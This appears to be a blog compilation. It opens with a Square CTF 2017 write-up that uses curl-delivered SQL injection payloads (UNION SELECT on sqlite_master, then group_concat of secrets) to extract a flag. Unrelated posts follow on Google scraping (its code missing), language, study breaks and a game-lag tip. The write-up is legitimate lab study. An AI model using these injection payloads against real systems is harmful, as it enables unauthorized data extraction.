Write-up: Little Doggy Tables, Square CTF 2017

This is a write-up for the challenge Little Doggy Tables from Square CTF 2017.

The challenge can be found here: https://squarectf.com/challenges/little-doggy-tables

The challenge requires us to use SQL injection to extract the flag from a table in the database.

On running this command:

curl -k "https://little-doggy-tables.capturethesquare.com/agent_lookup" --get --data-urlencode "codename=Fido"

I got the following output:

dog

Which means I can run SQL queries through this command.

Furthermore, the challenge details also include the source code , which looks like this:

From checking out the source code it is obvious that SQL injection is possible and that SQLite3 was used in the database.

To check if it was working, I ran:

curl -k "https://little-doggy-tables.capturethesquare.com/agent_lookup" --get --data-urlencode "codename='"

Which gave this Output:

Internal Server Error

unrecognized token: “‘\”;”

WEBrick/1.3.1 (Ruby/2.3.4/2017-03-30) at little-doggy-tables.capturethesquare.com:443
 

Now that I knew SQL injection was working, I had to access the meta data. Unfortunately, the information_schema table does not exist here since it is SQLite and not MySQL. I searched for an equivalent table in SQLite and came across this question on Stack Overflow:

https://stackoverflow.com/questions/6460671/sqlite-schema-information-metadata#6617764

Which gave me enough to realize that sqlite_master is the information_schema alternative in sqlite. I changed commands mentioned in the answer to the to suit my search.

All meta data in sqlite can be accessed simple by using the command:

select sql form sqlite_master

So I modified my payload to:

curl -k "https://little-doggy-tables.capturethesquare.com/agent_lookup" --get --data-urlencode "codename=' union select sql from sqlite_master-- -"

Which gave the output:

CREATE TABLE operatives (
codename TEXT,
species TEXT,
secret TEXT
)

Now we know both the name of the table and the name of the required column which is  obviously secret. The SQL query now required to be executed is:

select group_concat(secret) from operatives

The corresponding payload would be:

curl -k "https://little-doggy-tables.capturethesquare.com/agent_lookup" --get --data-urlencode "codename=' union select group_concat(secret) from operatives-- -"

The resulting output:

e5fa44f2b31c1fb553b6021e7360d07d5d91ff5e,7448d8798a4380162d4b56f9b452e2f6f9e24e7a,9c6b057a2b9d96a4067a749ee3b3b0158d390cf1,5d9474c0309b7ca09a182d888f73b37a8fe1362c,flag-a3db5c13ff90a36963278c6a39e4ee3c22e2a436,ccf271b7830882da1791852baeca1737fcbe4b90,d3964f9dad9f60363c81b688324d95b4ec7c8038,136571b4

On refining the above output we get that the flag is :

flag-a3db5c13ff90a36963278c6a39e4ee3c22e2a436

 

Google Search Scraping With Python

Python is a language that allows you to do great things with very little code, it has a great set of powerful libraries and packages. I hope to illustrate this here by demonstrating how you can scrape results off a google search using a very simple and short python script. Older versions of such scripts were dependent on the ajax google api which no longer work, this is an alternative approach.


The way this piece of code works is by using the two modules ‘urllib’ and ‘requests’. These two modules are at the centre of this piece of code. The ‘get’ function of the ‘requests’ module is what allows you to access the specified url and the ‘urllib’ module allows you to read the urls on the page and store/output them.

For this code to work, you will also need the lxml library and the CSSselect python package. These are needed to process the formatting of the results page. lxml does not need any installation and is widely used in python scripts. You can download their package, and read their documentation here: http://lxml.de/

Now for CSSselect, you might get this error if the package is not installed on your system:

To fix this you might want to download the CSSselect package, which you can do from here: https://pypi.python.org/pypi/cssselect

To install this package run this command from the directory where the downloaded .whl file is located:

After doing so, you can run the script and/or use it in your own programs to scape off google search results. Have fun!

Rules of Language

It is said that rules are meant to be broken when it comes to language, yet there exist Grammar Nazis.
It is frequently suggested by experienced experts to keep it simple, yet simplicity is associated with amateurity.

Language is meant to be a means of communication, advice that it does not require to follow rules is something that is often suggested, but rarely appreciated. Sometimes people feel annoyed at the improper use of the comma or underwhelmed by the simplicity of language used. William Shakespeare did not invent half the words we use today by simply following the rules, the suggestive fact that this generation of laureates refuses to break the rules can effect the future of language.

But is that true? I mean the internet community sure does not follow any rules, it creates treads once in a while, and flips it around again when they feel like it. Change is inevitable in the internet community. Society as a whole is deeply influenced by the language it uses, although English is now being widely used other languages are not easily suspectable to change.

Rules and Regulations are required for keeping chaos out, but it should not prevent you from adding a pause when you feel like it using a comma.

P. S.  I don’t know if there is a word called “amateurity” I used in the first paragraph, maybe it exits maybe it does not. The thing is, nobody stopped me from using it!

Language has no rules.

The Passive Mindset for Learning

As many of you might know I am a student, and 11 & 12 are considered two of the most crucial career defining years. I am about to face these years and it all starts with a break. This summer break is considered different from all the other ones that led to this, the techniques used to get past 10th might not work any longer in the coming years. Afraid of being left behind, most students during this time go to crash courses and similar so called foundation courses.

All of us cannot do this and even if we try, most of us may feel underwhelmed by the basic concepts being taught. Keep in mind that a solid foundation on the basics is very necessary but it does not have to be rebuilt, it may perhaps require some reinforcement which may be fulfilled by simple revision. The point I am trying to make here is the fact that all of us as students will be offered breaks, and rather than taking them many of us try to attain an edge over others during this time.

The first thing to understand here is that – all of us need breaks. While I also do understand that hard work and dedication are essential to success, maybe we can tone it down for a while. I like to call this attitude a passive mindset for learning, although I am not really sure if its very effective if you maintain it for longer than needed.

But I personally need it and it helps me a lot. When you are offered a break, take it and then – maybe read a book, walk in a park, practice some football with a friend or two and passively just think about what your doing, what you want to do, etc-etc. Don’t over think all this stuff rather let your thoughts flow. If your reading a book let it all in, what you may read might help in the future and help your language. Its better if do not watch a lot of action movies and stuff but don’t hesitate if you feel like you really need to watch a movie. Most of all, let all of it inspire you.

Steve Jobs says that you need to believe in something, something like destiny or karma which enforces the belief that all that you do today – even instinctively, will eventually help you in the future.

I buy that.

Metal Gear Solid V: Ground Zeroes PC – Reduce Lag and Random Freezes

MGSV:GZ is a greatly optimized game, but with so many random PC configurations out there, like every other game it comes with a few flaws too. These include occasional lagging and freezing. Thankfully I was able to fix them.

Although, a little out of the ordinary,it can be done by opening up the task manager while running the game –

>>Details Tab >> right click MgsGroundZeroes.exe (both)>> real time priority.

mgs

 

Note that this has to be done every time you start the game. and to both tasks called MgsGroundZeroes.exe.

Hope that this will improve your game’s performance.